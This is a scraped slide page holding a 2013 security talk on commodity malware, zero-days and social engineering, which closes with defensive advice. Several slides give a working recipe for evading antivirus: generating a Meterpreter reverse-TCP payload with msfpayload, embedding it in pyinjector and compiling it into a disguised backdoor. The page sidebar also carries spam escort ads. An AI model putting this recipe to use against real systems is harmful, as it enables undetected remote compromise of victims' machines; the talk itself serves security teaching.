Beyond Ethical Hacking By Nipun Jaswal , CSA HCF Infosec Pvt. LtdBeyond Ethical Hacking By Nipun Jaswal , CSA HCF Infosec Pvt. Ltd
Beyond Ethical Hacking By Nipun Jaswal , CSA HCF Infosec Pvt. Ltd
 
Thinking Outside the Sand[box]
Thinking Outside the Sand[box]Thinking Outside the Sand[box]
Thinking Outside the Sand[box]
 
Sandbox detection: leak, abuse, test - Hacktivity 2015
Sandbox detection: leak, abuse, test - Hacktivity 2015Sandbox detection: leak, abuse, test - Hacktivity 2015
Sandbox detection: leak, abuse, test - Hacktivity 2015
 
Rooted con 2020 - from the heaven to hell in the CI - CD
Rooted con 2020 - from the heaven to hell in the CI - CDRooted con 2020 - from the heaven to hell in the CI - CD
Rooted con 2020 - from the heaven to hell in the CI - CD
 
Python-Assisted Red-Teaming Operation
Python-Assisted Red-Teaming OperationPython-Assisted Red-Teaming Operation
Python-Assisted Red-Teaming Operation
 
Green Code Lab Challenge 2015 Subject Details
Green Code Lab Challenge 2015 Subject DetailsGreen Code Lab Challenge 2015 Subject Details
Green Code Lab Challenge 2015 Subject Details
 
ProdSec: A Technical Approach
ProdSec: A Technical ApproachProdSec: A Technical Approach
ProdSec: A Technical Approach
 
There’s an OpenBullet Attack Config for Your Site – What Should You Do?
There’s an OpenBullet Attack Config for Your Site – What Should You Do?There’s an OpenBullet Attack Config for Your Site – What Should You Do?
There’s an OpenBullet Attack Config for Your Site – What Should You Do?
 
Security Bootcamp 2013 - Automated malware analysis - Nguyễn Chấn Việt
Security Bootcamp 2013 - Automated malware analysis - Nguyễn Chấn ViệtSecurity Bootcamp 2013 - Automated malware analysis - Nguyễn Chấn Việt
Security Bootcamp 2013 - Automated malware analysis - Nguyễn Chấn Việt
 
Security events in 2014
Security events in 2014Security events in 2014
Security events in 2014
 
Using Blockchain to Increase Supply Chain Transparency
Using Blockchain to Increase Supply Chain TransparencyUsing Blockchain to Increase Supply Chain Transparency
Using Blockchain to Increase Supply Chain Transparency
 
WordPress Security and Best Practices
WordPress Security and Best PracticesWordPress Security and Best Practices
WordPress Security and Best Practices
 
Socially Acceptable Methods to Walk in the Front Door
Socially Acceptable Methods to Walk in the Front DoorSocially Acceptable Methods to Walk in the Front Door
Socially Acceptable Methods to Walk in the Front Door
 
Enter The back|track Linux Dragon
Enter The back|track Linux DragonEnter The back|track Linux Dragon
Enter The back|track Linux Dragon
 
Security at Greenhouse
Security at GreenhouseSecurity at Greenhouse
Security at Greenhouse
 

Dernier

Kalyanpur ) Call Girls in Lucknow Finest Escorts Service 🍸 8923113531 🎰 Avail...
Kalyanpur ) Call Girls in Lucknow Finest Escorts Service 🍸 8923113531 🎰 Avail...Kalyanpur ) Call Girls in Lucknow Finest Escorts Service 🍸 8923113531 🎰 Avail...
Kalyanpur ) Call Girls in Lucknow Finest Escorts Service 🍸 8923113531 🎰 Avail...gurkirankumar98700
 
Finology Group – Insurtech Innovation Award 2024
Finology Group – Insurtech Innovation Award 2024Finology Group – Insurtech Innovation Award 2024
Finology Group – Insurtech Innovation Award 2024The Digital Insurer
 
IAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI SolutionsIAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI SolutionsEnterprise Knowledge
 
Axa Assurance Maroc - Insurer Innovation Award 2024
Axa Assurance Maroc - Insurer Innovation Award 2024Axa Assurance Maroc - Insurer Innovation Award 2024
Axa Assurance Maroc - Insurer Innovation Award 2024The Digital Insurer
 
Handwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed textsHandwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed textsMaria Levchenko
 
Salesforce Community Group Quito, Salesforce 101
Salesforce Community Group Quito, Salesforce 101Salesforce Community Group Quito, Salesforce 101
Salesforce Community Group Quito, Salesforce 101Paola De la Torre
 
08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking Men08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking MenDelhi Call girls
 
Automating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps ScriptAutomating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps Scriptwesley chun
 
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time AutomationFrom Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time AutomationSafe Software
 
GenCyber Cyber Security Day Presentation
GenCyber Cyber Security Day PresentationGenCyber Cyber Security Day Presentation
GenCyber Cyber Security Day PresentationMichael W. Hawkins
 
Tata AIG General Insurance Company - Insurer Innovation Award 2024
Tata AIG General Insurance Company - Insurer Innovation Award 2024Tata AIG General Insurance Company - Insurer Innovation Award 2024
Tata AIG General Insurance Company - Insurer Innovation Award 2024The Digital Insurer
 
Factors to Consider When Choosing Accounts Payable Services Providers.pptx
Factors to Consider When Choosing Accounts Payable Services Providers.pptxFactors to Consider When Choosing Accounts Payable Services Providers.pptx
Factors to Consider When Choosing Accounts Payable Services Providers.pptxKatpro Technologies
 
Top 5 Benefits OF Using Muvi Live Paywall For Live Streams
Top 5 Benefits OF Using Muvi Live Paywall For Live StreamsTop 5 Benefits OF Using Muvi Live Paywall For Live Streams
Top 5 Benefits OF Using Muvi Live Paywall For Live StreamsRoshan Dwivedi
 
A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)Gabriella Davis
 
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...Neo4j
 
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...Igalia
 
How to convert PDF to text with Nanonets
How to convert PDF to text with NanonetsHow to convert PDF to text with Nanonets
How to convert PDF to text with Nanonetsnaman860154
 
2024: Domino Containers - The Next Step. News from the Domino Container commu...
2024: Domino Containers - The Next Step. News from the Domino Container commu...2024: Domino Containers - The Next Step. News from the Domino Container commu...
2024: Domino Containers - The Next Step. News from the Domino Container commu...Martijn de Jong
 
Partners Life - Insurer Innovation Award 2024
Partners Life - Insurer Innovation Award 2024Partners Life - Insurer Innovation Award 2024
Partners Life - Insurer Innovation Award 2024The Digital Insurer
 
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...apidays
 

Dernier (20)

Kalyanpur ) Call Girls in Lucknow Finest Escorts Service 🍸 8923113531 🎰 Avail...
Kalyanpur ) Call Girls in Lucknow Finest Escorts Service 🍸 8923113531 🎰 Avail...Kalyanpur ) Call Girls in Lucknow Finest Escorts Service 🍸 8923113531 🎰 Avail...
Kalyanpur ) Call Girls in Lucknow Finest Escorts Service 🍸 8923113531 🎰 Avail...
 
Finology Group – Insurtech Innovation Award 2024
Finology Group – Insurtech Innovation Award 2024Finology Group – Insurtech Innovation Award 2024
Finology Group – Insurtech Innovation Award 2024
 
IAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI SolutionsIAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI Solutions
 
Axa Assurance Maroc - Insurer Innovation Award 2024
Axa Assurance Maroc - Insurer Innovation Award 2024Axa Assurance Maroc - Insurer Innovation Award 2024
Axa Assurance Maroc - Insurer Innovation Award 2024
 
Handwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed textsHandwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed texts
 
Salesforce Community Group Quito, Salesforce 101
Salesforce Community Group Quito, Salesforce 101Salesforce Community Group Quito, Salesforce 101
Salesforce Community Group Quito, Salesforce 101
 
08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking Men08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking Men
 
Automating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps ScriptAutomating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps Script
 
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time AutomationFrom Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
 
GenCyber Cyber Security Day Presentation
GenCyber Cyber Security Day PresentationGenCyber Cyber Security Day Presentation
GenCyber Cyber Security Day Presentation
 
Tata AIG General Insurance Company - Insurer Innovation Award 2024
Tata AIG General Insurance Company - Insurer Innovation Award 2024Tata AIG General Insurance Company - Insurer Innovation Award 2024
Tata AIG General Insurance Company - Insurer Innovation Award 2024
 
Factors to Consider When Choosing Accounts Payable Services Providers.pptx
Factors to Consider When Choosing Accounts Payable Services Providers.pptxFactors to Consider When Choosing Accounts Payable Services Providers.pptx
Factors to Consider When Choosing Accounts Payable Services Providers.pptx
 
Top 5 Benefits OF Using Muvi Live Paywall For Live Streams
Top 5 Benefits OF Using Muvi Live Paywall For Live StreamsTop 5 Benefits OF Using Muvi Live Paywall For Live Streams
Top 5 Benefits OF Using Muvi Live Paywall For Live Streams
 
A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)
 
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...
 
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...
 
How to convert PDF to text with Nanonets
How to convert PDF to text with NanonetsHow to convert PDF to text with Nanonets
How to convert PDF to text with Nanonets
 
2024: Domino Containers - The Next Step. News from the Domino Container commu...
2024: Domino Containers - The Next Step. News from the Domino Container commu...2024: Domino Containers - The Next Step. News from the Domino Container commu...
2024: Domino Containers - The Next Step. News from the Domino Container commu...
 
Partners Life - Insurer Innovation Award 2024
Partners Life - Insurer Innovation Award 2024Partners Life - Insurer Innovation Award 2024
Partners Life - Insurer Innovation Award 2024
 
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
 

Give Me Three Things: Anti-Virus Bypass Made Easy

  • 1. Security Weekly™ Presents: Give Me Three Things Sometimes, three is bad http://securityweekly.com
  • 2. Brought To You By: consulting@blackhillsinfosec.com
  • 3. The Need for Focus • It is easy to get caught up in the latest “Hack of the day” • Let’s talk about • iPhone attacks, Android Malware, Backdoors from chargers, DLP, Hacking ATMs, breaking into drones, hacking obscure software X • But, when we get popped, it is going to be something simple • Cool stuff is cool, but the basics will kill you http://hacknaked.tv Copyright 2013
  • 4. #1 Crappy Malware • Had enough presentations on the “Not so advanced persistent threat?” • Somehow, the belief is if we can make fun of the attackers skill level it makes us….??? • Better? Smarter? • Why? • Because….. http://hacknaked.tv Copyright 2013
  • 6. About that Malware • It tends to be well known • It tends to have AV signatures* • Tracing it back to a specific group can be hard • Anyone can download it • It is not 1337 or even 31337 Just right http://hacknaked.tv Copyright 2013
  • 9. AV Bypass Made Easy • Many of these tools have options to export to a raw string of hex characters • In fact, that does not even matter • We can use Ghost Writing techniques • Simply exporting and re-importing as a script does the trick • Flame did this with Lua This and cookies: Why I pentest http://hacknaked.tv Copyright 2013
  • 10. Ghost Writing: Creating the Binary http://hacknaked.tv Copyright 2013
  • 11. Converting to Assembly http://hacknaked.tv Copyright 2013
  • 12. Editing the Assembly http://hacknaked.tv Copyright 2013
  • 13. Finalize the Payload http://hacknaked.tv Copyright 2013
  • 14. Python Injection • Another technique is to: • Convert your payload into Raw output • Import the Raw output into a python script • Convert the Python script into an executable • It is all because the text sections of an .exe not being reviewed by many AV vendors • They would have to write the signature for Python itself • Not likely • Great write up by Mark Baggett • http://tinyurl.com/SANS-580-Python-AV-Bypass http://hacknaked.tv Copyright 2013
  • 15. Windows AV Bypass - Setup • Create a Windows box with prerequisites • Same as target (32-bit vs. 64-bit) • Install Python: http://www.python.org/ • Add Python to system PATH • Install PyWin32: http://sourceforge.net/projects/pywin32/ • Install PyInstaller: http://www.pyinstaller.org/ • Download PyInjector: https://www.trustedsec.com/files/pyinjector.zip http://hacknaked.tv Copyright 2013
  • 16. Windows AV Bypass - Config • Extract files from PyInjector • Move pyinjector.py into root of PyInstaller folder • Use msfpayload to generate alphanumeric shellcode (on any machine) • msfpayload windows/meterpreter/reverse_tcp LHOST=127.0.0.1 C | tr -d '"' | tr -d http://hacknaked.tv Copyright 2013 'n' | more • Make sure payload matches architecture! • Within pyinjector.py: • replace: shellcode = sys.argv[1] • with: shellcode = '<msfpayload output>’ • where: <msfpayload output> = output from the above msfpayload command
  • 17. Windows AV Bypass - Compile • While in the PyInstaller Directory: • python utilsMakespec.py --onefile --noconsole pyinjector.py • python utilsBuild.py pyinjector/pyinjector.spec • New backdoor should be under: • [PyInstaller]/pyinjector/dist/pyinjector.exe • Rename the executable, deploy, profit • Don’t forget your listener!!! http://hacknaked.tv Copyright 2013
  • 18. Or You Could Just Choose Option 15 OOppttioionn 1155 http://hacknaked.tv Copyright 2013
  • 19. #2 0-day Dejour • Yeah, another favorite for attackers • There is always another 0-day • Attackers seem to jump on this bandwagon fast and stay on it till it is no longer effective • Why? Because it works • They do a lot with volume • What is your patch success percentage? http://hacknaked.tv Copyright 2013
  • 20. Lessons • Black-list AV is easy to bypass • In fact, we had to do it with Poison Ivy last week • Yeah, a piece of malware 5 years old • The attackers will be exactly as advanced as they need to be • Which is not very advanced http://hacknaked.tv Copyright 2013
  • 21. Focus and Future Plans • Hacker Guard Lesson: don’t just focus on malware, focus on detecting an attacker’s impact on a system • Get away from Black List Security • Now • Right now • .. I mean after this presentation http://hacknaked.tv Copyright 2013
  • 22. #3 Users Making “Mistakes” • How could we have a presentation without this? • There is no way hackers would be this successful without users • Ha Ha!!! Users are “dumb” • Yeah.. • Right? • Not so fast sparky http://hacknaked.tv Copyright 2013
  • 23. We are all Dumb • Or, the pretexts for the attackers are getting really, really good • Some SE pretexts we use are not fair • Major insurance company and a change of coverage • Linked-in merit badges • If the attack is tailored, it is successful http://hacknaked.tv Copyright 2013
  • 24. Caller ID Spoofing http://hacknaked.tv Copyright 2013
  • 25. Hail Pentest Geek! http://www.pentestgeek.com/2013/04/30/pwn-all-the-sauce-with-caller-id-spoofing/ http://hacknaked.tv Copyright 2013
  • 26. Lessons • Users are going to make mistakes • Not because they are dumb • Well, half of them are below average • Because they are not trained • And because the attackers are good http://hacknaked.tv Copyright 2013
  • 27. Focus and Future Plans • Hacker Guard Lesson: Once again, focus on attacker actions • Limit the damage the user can do • Implement Firewalls • Implement Software Restriction Policies • Implement Internet Whitelisting • But don’t simply believe the user is stupid • Train them: Securing the Human http://hacknaked.tv Copyright 2013
  • 28. Conclusions • While bright shiny objects are bright and shiny • We need to come back to basics and fundamentals • We loose sight of that in this industry http://hacknaked.tv Copyright 2013
  • 29. OCM at Black Hat • Offensive Countermeasures at Black Hat 2013 • http://tinyurl.com/HN TV-BH-2013 http://hacknaked.tv Copyright 2013
  • 30. End of Line • Hack Naked TV Episodes • http://www.hacknaked.tv • Watch us: • Blip.tv: http://blip.tv/securityweekly • YouTube: http://youtube.com/securityweeklytv • Subscribe via iTunes: • https://itunes.apple.com/us/podcast/pauls-security-weekly-tv/id121896233?mt=2 http://hacknaked.tv Copyright 2013

Notes de l'éditeur

  1. Intro slide, change your name